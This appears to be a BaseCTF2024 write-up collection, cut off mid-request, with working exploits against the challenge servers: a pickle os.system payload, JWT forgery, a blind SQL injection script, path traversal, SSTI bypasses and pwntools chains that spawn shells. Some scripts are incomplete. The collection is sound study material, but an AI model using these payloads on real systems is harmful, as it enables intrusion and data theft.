BaseCTF2024 Writeup

wp合集

Week1 wp

Week2 wp

Week3 wp

Week4

Misc

Pickle Init

# Challenge server code, as recorded by the author: it reads 50 characters
# from stdin and passes them straight to pickle.loads.
# Unpickling client-supplied bytes is code execution by design, because the
# pickle stream itself names the callable to import and invoke.
# Mitigation: never unpickle untrusted input; use a data-only format (e.g.
# JSON) or an Unpickler subclass whose find_class() allow-lists safe globals.
# "__import__('pickle').loads(__import__('sys').stdin.read(50).encode('ASCII'))"
# Hand-written protocol-0 pickle: `c` pushes the global os.system, `(` sets a
# mark, `S` pushes the string 'cat flag', `t` builds the argument tuple,
# `R` calls the callable with that tuple and `.` ends the stream.
r1 = b"""cos
system
(S'cat flag'
tR."""

from pwn import remote

s = remote('challenge.basectf.fun', 48739)
# The server reads exactly 50 characters, so the stream is padded with NUL
# bytes; the unpickler stops at the `.` opcode and ignores what follows.
payload = r1.ljust(50, b'\x00')
s.sendline(payload)
s.interactive()

[Week4] 小cheny的社交

stegsolve 翻出来

MDAxMTAwMTEgMDAxMTEw
MDAgMDAxMTAxMDAgMDAx
MTEwMDAgMDAxMTAxMTAg
MDAxMTAxMDAgMDAxMTAx
MDEgMDAxMTAwMTAgMDAx
MTAwMDAgMDAxMTAxMTE=

先把上面的 base64 解码得到一串二进制,再把二进制按 8 位一组转成 ASCII:
3848645207

web

[Week4] No JWT

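代码审计:JWT 密钥是假的(从结果看服务端并未真正校验签名),直接修改 token 中 base64 编码的 payload 即可;注意服务端取的是 token 切分后的第 [1] 段(见下面请求里的 Authorization 头)。防御上应使用真实密钥校验签名并固定算法,校验失败直接拒绝。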

GET /flag HTTP/1.1
Host: challenge.basectf.fun:44164
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: 1 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6MTcyNTgwNTkwMH0.OpgToND1Vus3KKYhYN_DROfJE12tjJGtE01ydiqyth0
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close

[Week4] flag直接读取不就行了?

php原生类利用 - bcxc9405 - 博客园 (cnblogs.com)

POST /?K=DirectoryIterator&W=%2fsecret HTTP/1.1
Host: challenge.basectf.fun:22382
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

J=SplFileObject&H=%2fsecret%2ff11444g.php

[Week4] 圣钥之战1.0

/static/proc/1/environ

POST /pollute HTTP/1.1
Host: challenge.basectf.fun:39196
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
Content-Type: application/json
Content-Length: 235

{
    "username":"1",
    "password":"1",
    "\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f":{
        "__globals__":{
        "app":{
            "_static_folder":"/"
            }
        }
    }
}

[Week4] only one sql

show columns from flag

import string
import urllib
from time import sleep
import requests
from tqdm import tqdm
# Time-based blind extraction against a CTF endpoint that executes whatever
# statement arrives in the `sql` query parameter.
# Defender's view: the root cause is the endpoint running client-supplied SQL.
# Mitigations are to never accept raw SQL from clients, to run the application
# with a least-privilege database account and to enforce statement timeouts.
# For detection, look for repeated requests containing SLEEP( whose response
# time clusters around the sleep value.
session = requests.Session()
# NOTE(review): requests.Session does not document a keep_alive attribute;
# this assignment likely has no effect. Confirm before relying on it.
session.keep_alive = False  
key = ''
# Overrides the empty value above with hex digits that were already recovered
# (presumably from an earlier run), so the search resumes from there.
key='426173654354467B33663038653762642D613135632D346163332D626334382D636335316532306434343930'

# Only the last assignment to cipin is effective; the first two are leftovers
# from alphabets used for other targets.
cipin = "flagetoinsrhdcumwypbvkxjqz0123456789FLAGETOINSRHDCUMWYPBVKXJQZ!\"#$&'()*+,-./:;<=>?@[\\]^`{|}~_"
cipin = "1234567890FLAGETOINSRHDCUMWYPBVKXJQZflagetoinsrhdcumwypbvkxjqz!\"#$&'()*+,-./:;<=>?@[\\]^`{|}~_"
# Hex alphabet, matching the hex(data) comparison in the statement below.
cipin = "123456789ABCDEF0"
# dic_t=string.printable.replace('%','').replace('_','')
dic_t = cipin
print(dic_t)
start = 1  # 1+78
end = 256  # 256+78
# index_key only bounds the number of rounds; the statement always compares
# the whole recovered prefix starting at position 1.
for index_key in (range(start, end)):
    # print(index_key,'==>')
    # if len(key)+78 < index_key - 1:
    #     exit(1)
    for one_dic in tqdm(dic_t):
        # if(ASCII(substr((select(group_concat(table_name))from(information_schema.tables)),1,1))LIKE(57),SLEEP(2),0)
        one_dic_asc = str(ord(one_dic))  # unused by the current statement

        # single quotes are allowed here
        pay = "delete from flag where 1=12 or(if((substr(hex(data)," + str(1) + ",1000))LIKE('" + key + one_dic + "%'),SLEEP(2),0))"
        # urlencode
        # NOTE(review): only `import urllib` is visible above; urllib.parse is
        # a submodule and should be imported explicitly.
        burp0_url = "http://challenge.basectf.fun:29136/?sql=" + urllib.parse.quote(pay)

        # NOTE(review): burp0_headers is not defined anywhere in the visible
        # script; presumably it was dropped when the writeup was pasted.
        req = session.get(burp0_url, headers=burp0_headers)
        if req.status_code != 200:
            print('错误', req.status_code)
            print(burp0_url)
            sleep(5)
        req.encoding = 'utf-8'
        content = req.text  # read but never inspected; only timing is used
        # print(content)
        req.close()  # close the response to release resources
        # A response slower than the SLEEP(2) threshold is taken as a match.
        # Network jitter can cause false positives with this single sample.
        if req.elapsed.total_seconds() > 2:
            key = key + one_dic
            print(key)
            break

Week3

Crypto


Done|[Week3] exgcd

扩展欧几里得 RSA共模攻击(包括原理)-CSDN博客

b'BaseCTF{feb7e1ae-a8f7-4fc4-8d6d-945a45cc3f6d}'

n = 27855350163093443890983002241607629119744539643165776358993469078731521668677421483556132628708836721737685936980427467856642738196111748018522018598646125626995613169001111504706363742194664774823604738939411512861441742683157275818500991834651769368178320088982759626122029956515159435424882855075032400667120376075618896752694718491438251810609878021717559466498493103257912108879328270813061231904227056671621363669388496383136964549879459562004569059185078204867346250733489663015417879915436157806942021693920206071715538430633494012923651469196048546309592946901609803631751035364478773126967010589504275776307
e1 = 3747
e2 = 2991
c1 = 24426579024062518665031958216110619832653602343205488454298659533869220501923184793828421371206493659949730138867555889074137026401207985428160803910695088081370233571905915349589146504374710444468715701305061060934519410886010929009297226496448218819742287990364436349188987723637449590579092391100714056589967894609950537021838172987840638735592599678186555961654312442380755963257875487240962193060914793587712733601168204859917001269928487633954556221987632934190217367502677285906521385169669644977192556145782303526375491484736352799180747403161343130663661867413380222714012960607473395828938694285120527085083
c2 = 6932145147126610816836065944280934160173362059462927112752295077225965836502881335565881607385328990881865436690904056577675885697508058289570333933837515526915707121125766720407153139160751343352211421901876051228566093038929625042619250168565502734932197817082848506826847112949495527533238122893297049985517280574646627011986403578166952789317461581409161873814203023736604394085875778774834314777046086921852377348590998381648241629124408514875110073073851913857329679268519229436092660959841766848676678740851087184214283196544821779336090434587905158006710112461778939184327386306992082433561460542130441825293

# RSA common-modulus recovery: the same message was encrypted under one
# modulus n with two exponents e1 and e2.
# Defender's view: never reuse a modulus across exponents for the same
# plaintext, and use randomized padding (e.g. OAEP) so that two encryptions
# of one message are unrelated.
# NOTE(review): gmpy2 and long_to_bytes are used here but their imports are
# not visible in this excerpt.
gcd_res=gmpy2.gcd(e1, e2)
# gcdext returns (g, s1, s2) with s1*e1 + s2*e2 == g.
s0, s1, s2 = gmpy2.gcdext(e1, e2)
print(s0, s1, s2) # 3 91 -114  # 1 -14272 7615 # 1 -183153 330830
# A negative Bezout coefficient is handled by inverting the matching
# ciphertext modulo n and using the absolute value as the exponent.
if s1 < 0:
    s1 = -s1
    c1 = gmpy2.invert(c1, n)
elif s2 < 0:
    s2 = -s2
    c2 = gmpy2.invert(c2, n)
# c1^s1 * c2^s2 == m^(s1*e1 + s2*e2) == m^g (mod n)
m = gmpy2.powmod(c1, s1, n) * gmpy2.powmod(c2, s2, n) % n
print('[-]m is:', m)
print(long_to_bytes(m))
# Take the integer g-th root (a cube root for these exponents).
# This is only correct when m^g is smaller than n, i.e. no modular reduction
# happened; iroot's second return value (exactness) is not checked here.
if gcd_res!=1:
    print('gcd_res',gcd_res)
    m2=gmpy2.iroot(m, gcd_res)[0]
    print(m2)
    print(long_to_bytes(m2))

Done|[Week3] wiener?

密码学硬核笔记——扩展维纳攻击_维纳攻击定理-CSDN博客

化简(原文此处的公式图片未能保留):



from Crypto.Util.number import *
import gmpy2
import decimal
a = 829374344780877053838760251345359097311540811993463349625630085472892814959843248358036249898871908548743719153319438638517170060651237635838827482534816419091949205584951292517303330452910012749674475329235689229498752425379611083979518257734473992186831474208400813283887045691145481237726578827559198828469462343342343287720369159899636816373592067698883361360269728719786071024354151682314608072902347335691012713629816579496252896260869382806838857194293618332286500427694077400072428506897829689703872985954772105672992293334668485358785863779749153981721900135318166811250762946069962348114491411585418993494561587403918162681937152503739843
# decimal.Decimal(
p = pow(10,648)

print('a',a)
print('p',p)
# input()
def continuedFra(x, y):
    """Return the continued-fraction quotients of x / y.

    Runs the Euclidean algorithm on (x, y) and records the integer quotient
    of every step. A zero y yields an empty list.
    """
    quotients = []
    while y:
        whole, rest = divmod(x, y)
        quotients.append(whole)
        x, y = y, rest
    return quotients


def Simplify(ctnf):
    """Fold a list of continued-fraction quotients into one fraction.

    Processes the quotients from last to first and returns the pair
    (numerator, denominator). With this seed a single quotient [q] gives
    (1, q), so the pair is the reciprocal of the usual convergent. An empty
    list gives (0, 1).
    """
    top, bottom = 0, 1
    for term in reversed(ctnf):
        top, bottom = bottom, term * bottom + top
    return top, bottom


def getit(c):
    """Return the Simplify() result for every proper prefix of c.

    Prefix lengths run from 1 to len(c) - 1, so the fraction built from the
    complete quotient list is not included.
    """
    return [Simplify(c[:length]) for length in range(1, len(c))]

cf = continuedFra(a, p)
print(cf)
print(getit(cf))
e=65537
c = 11032748573623426359632659657114807044712138586316710250985606809252700461490504487308849626514319062562557448839550994242999334882617031487618174168038491566640081840111747765753878087564318833273878755416584962921669911444225959335274753391800995531023212276838665202257007640354237043291129197348884914956663597240094662207929658519596987351984403258345205873566463643624175318315064440456858013874962784792564480286904620663695194689839431808082976248378509181327101557380978849545906691903896662095520288964101796965095129861467059775556110616007889846240936219381379219605528051627402300580239311202137582442057
# Try every convergent of a / p as a candidate factor pair: both parts must
# be prime before they are used as the two RSA primes.
for (r, k) in getit(cf):
    # print('r, k',r, k)
    # input()
    if r == 0 or not isPrime(r) or not isPrime(k):
        continue
    # y = abs(a*r - k*p)
    print('r', r)
    print('k', k)
    n=r*k
    phi= (r-1)*(k-1)
    print(e)
    print(phi)
    t=gmpy2.gcd(e,phi)
    print('t',t)
    # NOTE(review): dividing e by gcd(e, phi) only gives a true decryption
    # exponent when t == 1. For other t the value of d does not invert e,
    # and invert() fails if e//t still shares a factor with phi.
    d= int(gmpy2.invert(e//t,phi))
    y= pow(c,d,n)
    flag = long_to_bytes(y)
    print(flag)
    # Printed a second time when the plaintext looks like a flag.
    if b'CTF' in flag:
        print(flag)

Done| [Week3]ez_log

sage求离散对数

# SageMath snippet: solve y^x = z (mod n) for x with the built-in
# discrete_log. The challenge script below generates n with getPrime(28),
# and a modulus that small offers no protection against discrete-log solvers.
y = 82941012
n = 228338567
z = 51306718
x=discrete_log(z,mod(y,n))
print (x)
from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b, getPrime
from Crypto.Cipher import AES
from random import randint


# Placeholder flag used when re-running the challenge script locally.
flag = b"flag{test_flag}"

# Zero-pads x up to the next multiple of 16 bytes. Input that is already a
# multiple of 16 gets a full extra block of 16 NUL bytes.
pad = lambda x: x+b'\x00'*(16-len(x)%16)
# Prints the lambda object itself, not any padded data.
print(pad)
def encrypt(KEY):
    """Encrypt the module-level ``flag`` with AES in ECB mode under KEY.

    ECB uses no IV and encrypts equal plaintext blocks to equal ciphertext
    blocks, which is acceptable for this puzzle but not for real data.
    """
    return AES.new(KEY, AES.MODE_ECB).encrypt(flag)
def decrypt(KEY):
    """Decrypt the module-level ``enc`` with AES in ECB mode under KEY."""
    return AES.new(KEY, AES.MODE_ECB).decrypt(enc)

# Challenge generation, as reproduced by the author.
flag = pad(flag)
# x is the secret exponent and also the only AES key material. It is drawn
# from [10**7, 10**8], so the key has well under 32 bits of entropy.
x = randint(10 ** 7, 10 ** 8)
y = randint(10 ** 7, 10 ** 8)
# A 28-bit prime modulus: discrete logarithms here are trivial to compute.
n = getPrime(28)
z = pow(y, x, n)

# The AES key is the big-endian bytes of x, zero-padded to 16 bytes.
enc = encrypt(pad(l2b(x)))
print(f'enc = {b2l(enc)}')
print(f'y = {y}')
print(f'n = {n}')
print(f'z = {z}')
# Round-trip check: decrypting with the same key should print the padded flag.
print(decrypt(pad(l2b(x))))

# Solve step: plug in the published challenge values together with the x
# recovered by the discrete-log computation, then decrypt.
x=38806815
enc = 33416570913716503492297352041317858420349510954381249751537743898024527101872454706181188441210166165803904185550746
y = 82941012
n = 228338567
z = 51306718
# decrypt() reads the module-level enc, so it must be bytes before the call.
enc=l2b(enc)
print(decrypt(pad(l2b(x))))

Done|[Week3] 没有n啊

P10 = 2

P1 = 3

P2 = 73

P4 = 3967

P40 = 6373

P19 = 4744823012787277141

P8 = 95592293

P9 = 216465863

P263 = 48245998253859255581546561942142167304434549996919484957120717763726325509833409296170471619434291990255044694414983821250538266717293535917534918221352198192885071310932646412147737114561229291373456448363184353049796801297876664512630305475226391199481032049429

n = 41078537283946718963867901444418587861374852549298581021160514707533456880649575554160808265785252954671072625328988077610467094845517440017082778974841917530114657609059448190572912125442280853514427857000821711800055969463230442969916805291740261864969371381161948988667040714627181514640499564446192371749

assert (c_trueX == pow(m_trueN, e, n_trueC)) 正确

e d也互素

m = pow(c, d, n+c)

print(long_to_bytes(m))

p =2213

q= 18562375636668196549420651353103745079699436307861988712679853008374811062200440828811933242559987778884352745291002294446663847648222973347077622672770861965709289475399660275902807105938671872351752307727438640668800709201640507442348307858897542641197185441103456388914162094273466567844780643672025473

[Week3] 没有n啊 pro

Misc


Done | [Week3] Base revenge[F]

base64隐写 得到 JnUaAFMFImgANSEuAWYuBE9SyaYpC2ldBrU9

atbash解 QmFzZUNURntZMHVfZDBfYV9HbzBkX2owYiF9 再base64

BaseCTF{Y0u_d0_a_Go0d_j0b!}

Done | [Week3] broken.mp4

Digital Video Repair 修复

BaseCTF{x1a_Ci_1_DIn9_y0Ng_MKV}

Done | [Week3] 纯鹿人[f]

word打开 显示隐藏文字有 密码

ikunikun

docx解压在图片里找到 隐藏压缩包

BaseCTF{d176adc7-5919-4a0c-9556-0301fc4d9c35}

Done | [Week3] 这是一个压缩包【F】

压缩包注释提示密码形如 BaseCTF??????FTCesaB,整体是前后对称的逆序(回文)结构,自己写脚本爆破中间 6 位。

爆破后密码为 BaseCTF_h11h_FTCesaB

BaseCTF{a7da6763-5013-4963-9c23-8fb3d049bdce}

Done | [Week3] 外星信号

外星录音.mp3 读取摩斯 有一段

-... .- ... . -.-. - ..-. ----.-- ..--- . -... . -.... ..-. -.. -.-. -....- -.... ----- -.. -.-. -....-

BASECTF2EBE6FDC-60DC-

BaseCTF{2ebe6fdc-60dc-

mp3里有一段zip解压出来 flag.mp3

sstv -d 'flag.mp3' -o 1.png


....- ----. .- ....- -....- .- ----. ----. ..--- -....- ...-- -... -... -.. ..... -.... ..-. ...-- ..-. -.. ----- -... ----.-

49a4-a992-3bbd56f3fd0b

BaseCTF{2ebe6fdc-60dc-49a4-a992-3bbd56f3fd0b}

Done|[Week3] 白丝上的flag

依据算法,水印点不会改变坐标,直接加密新图,与加密原图xor

BaseCTF{there_is_the_flag@}

Done | [Week3] 我要吃火腿!

兽音解码

异或脚本再跑一次解密.

def xor_with_ham(input_file, output_file):
    """XOR a file with the repeating 3-byte key b"Ham" and write the result.

    The whole input is read into memory, each byte is XORed with the key byte
    at (offset mod 3), and the transformed bytes are written to output_file.
    Applying the function twice restores the original content.
    """
    key = bytes((0x48, 0x61, 0x6D))

    with open(input_file, 'rb') as src:
        raw = src.read()

    transformed = bytes(
        value ^ key[offset % 3] for offset, value in enumerate(raw)
    )

    with open(output_file, 'wb') as dst:
        dst.write(transformed)

# Undo the XOR on the challenge image; XOR with the same repeating key is its
# own inverse, so the encoder doubles as the decoder.
xor_with_ham('Hamorl.jpg', 'Ham.jpg')

分离出wav

sstv -d '00000415.wav' -o 1.png

BaseCTF{SSTV_Happpy!}

pwn


[Week3] stack_in_stack

if __name__ == '__main__':
    # NOTE(review): `r`, `p64` and `searcher` are not defined in this excerpt;
    # presumably a pwntools tube and helpers plus a libc-database lookup that
    # were set up earlier in the original script.
    # Defender's view: the service prints a raw address after its banner and
    # a second one after "You found the secret!", and all code addresses
    # below are fixed constants. Disclosed pointers, fixed code addresses and
    # an oversized read are what make this chain possible. Building as PIE,
    # bounding the read to the buffer size and not printing pointers would
    # each break it.

    # The banner is followed by a hex value, parsed here as an address
    # (presumably the stack buffer the program reads into; confirm).
    r.recvuntil(b"It looks like something fell off mick0960.\n")
    buff_addr = int(r.recvuntil("\n"), 16)

    ret_addr = 0x000000000040101a  #: ret
    leave_ret_addr = 0x4012f2
    main_addr = 0x401245
    magic_addr = 0x4011C6

    # First input: eight 8-byte words (0x40 bytes in total).
    p = p64(buff_addr)
    p += p64(ret_addr)

    p += p64(magic_addr)  # magic
    p += p64(ret_addr)

    p += p64(main_addr)  # main
    p += p64(0x4012B5)   # read

    # The last two words are the buffer address and a `leave; ret` address;
    # presumably they land on the saved frame pointer and return address so
    # that execution continues from the words placed above. Confirm this
    # against the binary's frame layout.
    p += p64(buff_addr)
    p += p64(leave_ret_addr)

    r.sendline(p)

    # The value printed after this banner is treated as the runtime address
    # of puts, and the libc base is derived from it for the named libc build.
    r.recvuntil(b"You found the secret!\n")
    remote_puts_addr = int(r.recvuntil("\n"), 16)

    libc_id = 'libc6_2.35-0ubuntu3.8_amd64'
    libc_base = remote_puts_addr - searcher.dump(libc_id, "puts")

    '''
    0xebc81 execve("/bin/sh", r10, [rbp-0x70])
    constraints:
    address rbp-0x78 is writable
    [r10] == NULL || r10 == NULL || r10 is a valid argv
    [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
    '''
    onegadget = 0xebc81

    # The program is back at its prompt, so the new buffer address is read.
    r.recvuntil(b"It looks like something fell off mick0960.\n")
    buff_addr = int(r.recvuntil("\n"), 16)

    # Second input: 0x30 filler bytes, then a frame-pointer value chosen
    # relative to the buffer (presumably to satisfy the rbp-relative
    # constraints quoted above), then the libc-relative target address.
    p = b'A' * 0x30
    p += p64(buff_addr+0x50 +0x70)
    p += p64(libc_base + onegadget)

    r.sendline(p)
    r.interactive()

[Week3] format_string_level2

if __name__ == '__main__':
    # NOTE(review): `r`, `elf`, `searcher` and `fmtstr_payload` are not
    # defined in this excerpt; presumably pwntools objects and a
    # libc-database helper set up earlier in the original script.
    # Defender's view: the target passes user input to a printf-style
    # function as the format string. The fix is printf("%s", buf). Full RELRO
    # (read-only GOT) and _FORTIFY_SOURCE format checks limit the damage if
    # such a call slips through.
    
    p = b""
    # Positional %p conversion: prints the 61st argument slot as a pointer.
    p += b"aaaa%61$p"

    r.sendline(p)

    # The leaked pointer minus 128 is treated as __libc_start_main
    # (presumably a return address 128 bytes into that function; confirm for
    # the libc build named below).
    libc_start_main = int(r.recvuntil(b"\n").replace(b'aaaa', b''), 16) - 128

    libc_id = 'libc6_2.35-0ubuntu3.8_amd64'

    libc_base = libc_start_main - searcher.dump(libc_id, '__libc_start_main')

    printf_got = elf.got['printf']

    system_addr = libc_base + searcher.dump(libc_id, 'system')

    # Format-string write that replaces the GOT entry of printf with the
    # address of system; 6 is the argument offset of the input buffer.
    p = fmtstr_payload(6, {printf_got: system_addr})

    r.sendline(p)

    # With the GOT entry replaced, the program's next printf(input) call
    # resolves to system(input).
    r.sendline('/bin/sh')

    r.interactive()

[Week3] PIE

# coding=utf-8
from pwn import *

# Defender's view: the target reads more than its 0x100-byte buffer holds and
# then echoes the buffer without a terminator, so the bytes after it are
# disclosed. A bounded read, a terminated buffer and stack canaries would
# each stop this chain. PIE/ASLR alone does not, because a one-byte
# overwrite leaves the randomized upper bytes intact.
context.arch = 'amd64'
elf = ELF("./vuln")

if __name__ == '__main__':
    # r = process(["./ld-linux-x86-64.so.2", file_name], env={"LD_PRELOAD": "./libc.so.6"})
    r = remote("challenge.basectf.fun", "20674")

    # Stage 1: 0x100 filler bytes, 8 more bytes, then a single byte that
    # replaces only the lowest byte of the value that follows (presumably the
    # saved return address; confirm against the binary).
    p = b""
    p += b'A' * 0x100
    p += b'B' * 8
    p += b'\x1c'

    r.send(p)

    # The echoed output continues past the 'B' run; the next 6 bytes are read
    # as a little-endian pointer into libc.
    r.recvuntil(b'B' * 0x8)
    libc_main_base = unpack(r.recv(6).ljust(8, b'\x00')) - 12

    # The -12 above and the +12 here cancel; the net offset is 0x29d1c.
    libc_base = libc_main_base - 0x29d1c + 12

    # All offsets below are specific to the bundled ./libc.so.6.
    libc = ELF("./libc.so.6")
    system_offset = libc.symbols['system']
    pop_rdi = 0x000000000002a3e5 #: pop rdi ; ret
    bin_sh_offset = 0x00000000001d8678 #: /bin/sh
    ret = 0x0000000000029139 #: ret
    # Stage 2: same filler, then a return chain built from libc addresses.
    p = b""
    p += b'A' * 0x100
    p += b'B' * 8
    p += p64(ret + libc_base)
    p += p64(pop_rdi + libc_base)
    p += p64(bin_sh_offset + libc_base)
    p += p64(system_offset + libc_base)
    r.send(p)

    r.interactive()

其中,0x1c的magic,采用爆破的方法:
    # Local search for the one-byte value used in stage 1: each candidate is
    # tried against a fresh local process, and a candidate counts as working
    # when the program survives long enough to echo the second input.
    # NOTE(review): range(0xff) stops at 0xfe, so 0xff is never tried.
    # NOTE(review): `file_name` is not defined in the visible script.
    # NOTE(review): the spawned process is never closed, so every iteration
    # leaks a child process.
    for i in range(0xff):
        try:

            r = process(["./ld-linux-x86-64.so.2", file_name], env={"LD_PRELOAD": "./libc.so.6"})
            p = b""
            p += b'A' * 0x100
            p += b'B' * 8
            p += p64(i)[:1]
            r.send(p)
            r.recvuntil(b'BBBBBBBB')
            # print(r.recvuntil(b'BBBBBBBB'))
            r.sendline(b"111111111111")
            print(r.recvuntil(b'111111111111'))
            print(hex(i))
        # NOTE(review): a bare except also swallows KeyboardInterrupt, so the
        # loop cannot be stopped with Ctrl-C while a candidate is failing.
        except :
            continue

[Week3] 你为什么不让我溢出

    # NOTE(review): `r`, `unpack`, `p64` and `info_addr` are not defined in
    # this excerpt; presumably pwntools helpers and a local logging function.
    # Defender's view: the program echoes an unterminated buffer, which
    # discloses the stack canary, and then accepts a second oversized input.
    # Terminating the buffer before printing and bounding both reads removes
    # the leak and the overwrite.

    # First input: 0x68 filler bytes plus one extra byte 'C'. Presumably the
    # 'C' replaces the canary's low byte (normally NUL), so the echo runs on
    # through the remaining 7 canary bytes.
    p = b""
    p += b"A" * 0x60
    p += b"B" * 0x8
    p += b"C"

    r.send(p)
    r.recvuntil(b"C")
    # Rebuild the 8-byte value by prepending a NUL byte to the 7 leaked ones.
    canary = unpack(r.recv(7).rjust(8, b"\x00"))
    info_addr("canary", canary)

    # Second input: same filler, the recovered canary, a dummy frame-pointer
    # value, then two fixed code addresses used as return targets.
    p = b""
    p += b"A" * 0x60
    p += b"B" * 0x8
    p += p64(canary)
    p += p64(0xdeedbeef)
    p += p64(0x000000000040101a)
    p += p64(0x4011B6)

    r.send(p)
    r.interactive()

Reverse


Done | [Week3] Dont-debug-me

汇编删除掉反调试.直接jmp到最后.自动出flag

BaseCTF{8ea2710a717f89d83af695d312fe3b625df14a6ba6b3a74e15ed1e2d35cb10}

[Week3] UPX PRO

Done | [Week3] 出题人已疯

直接把题目源代码抄过来。小改下

using System;

namespace ConsoleApplication1
{
    // Solver adapted from the challenge's own source: it runs the check
    // routine backwards to turn the stored constants into the flag text.
    internal class Program
    {
        public static void Main(string[] args)
        {
            // Key material: the sentences are concatenated and their UTF-16
            // code units are used as a repeating XOR key.
            string[] sentences = new string[]
            {
                "你以为我还会在乎吗?\ud83d\ude2c\ud83d\ude2c\ud83d\ude2c我在昆仑山练了六年的剑\ud83d\ude1f\ud83d\ude1f\ud83d\ude1f我的心早就和昆仑山的雪一样冷了\ud83d\ude10\ud83d\ude10\ud83d\ude10我在大润发杀了十年的鱼\ud83d\ude2b\ud83d\ude2b\ud83d\ude2b我以为我的心早已跟我的刀一样冷了\ud83d\ude29\ud83d\ude29\ud83d\ude29",
                "我早上坐公交滴卡的时候和司机大叔说“两个人”,司机惊讶地看着我“你明明就是一个人,为什么要滴两个人的卡?”我回他,“我心中还有一个叫Kengwang的。”司机回我说,“天使是不用收钱的。”",
                "(尖叫)(扭曲)(阴暗的爬行)(扭动)(阴暗地蠕动)(翻滚)(激烈地爬动)(痉挛)(嘶吼)(蠕动)(阴森的低吼)(爬行)(分裂)(走上岸)(扭曲的行走)(不分对象攻击)",
                "地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!",
                "扭曲上勾拳!阴暗的下勾拳!尖叫左勾拳!右勾拳爬行!扭动扫堂腿!分裂回旋踢!这是蜘蛛阴暗的吃耳屎,这是龙卷风翻滚停车场!乌鸦痉挛!老鼠嘶吼!大象蠕动!愤怒的章鱼!无差别攻击!无差别攻击!无差别攻击!"
            };

            // Expected values the original program compares the transformed
            // input against; one entry per flag character.
            uint[] source = new uint[]
            {
                24164U, 27173U, 32145U, 17867U, 40533U, 21647U, 17418U, 30032U, 27950U, 62998U, 60750U, 64870U, 52680U,
                61797U, 49234U, 59762U, 16704U, 19200U, 32132U, 24038U, 21764U, 30130U, 28113U, 23070U, 27413U, 27917U,
                28938U, 50207U, 64834U, 60132U, 64832U, 63334U, 55103U, 22176U, 21991U, 20073U, 22281U, 19476U, 28302U,
                24336U, 24720U, 19544U, 23018U, 43976U
            };
            // Work on a copy so the constants stay untouched.
            uint[] array = new uint[source.Length];
            Array.Copy(source, array, source.Length);
            char[] array2 = string.Join("", sentences).ToCharArray();

            for (int i = 0; i < array.Length; i++)
            {
                // The two commented-out lines are the forward steps of the
                // original check: square, then XOR with index and key.
                // array[i] *= array[i];
                // array[i] = (char)((int)array[i] ^ i ^ (int)array2[i % array2.Length]);
                // Inverse, in reverse order: undo the XOR first, then take
                // the square root. The cast truncates, so this assumes every
                // intermediate value is a perfect square.
                array[i] = (uint)((int)array[i] ^ i ^ (int)array2[i % array2.Length]);
                array[i] = (uint)Math.Sqrt(array[i]);
            }

            // Marker line, followed by the recovered characters.
            Console.Out.WriteLine("111");
            for (int i = 0; i < array.Length; i++)
            {
                Console.Out.Write((char)array[i]);
            }
        }
    }
}

Done | [Week3] 世界上最简单的题目

流密码.直接把密文输入进去调试..比较时得到 flag

BaseCTF{easyvmvmvm}

Web

Done| [Week3]滤个不停

目录穿越

POST / HTTP/1.1
Host: challenge.basectf.fun:32225
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

incompetent=HelloWorld&Datch=esvanxro%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fflag

Done|[Week3] 复读机

ssti绕waf

步骤1:BaseCTF{%print ()|attr('%c%ccl''ass%c%c'%(95,95,95,95))|attr('%c%cba''se%c%c'%(95,95,95,95))|attr('%c%csubcl''asses%c%c'%(95,95,95,95))()%}

POST /flag HTTP/1.1
Host: challenge.basectf.fun:23159
Content-Length: 710
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://challenge.basectf.fun:32428
Referer: http://challenge.basectf.fun:32428/
Accept-Encoding: gzip, deflate
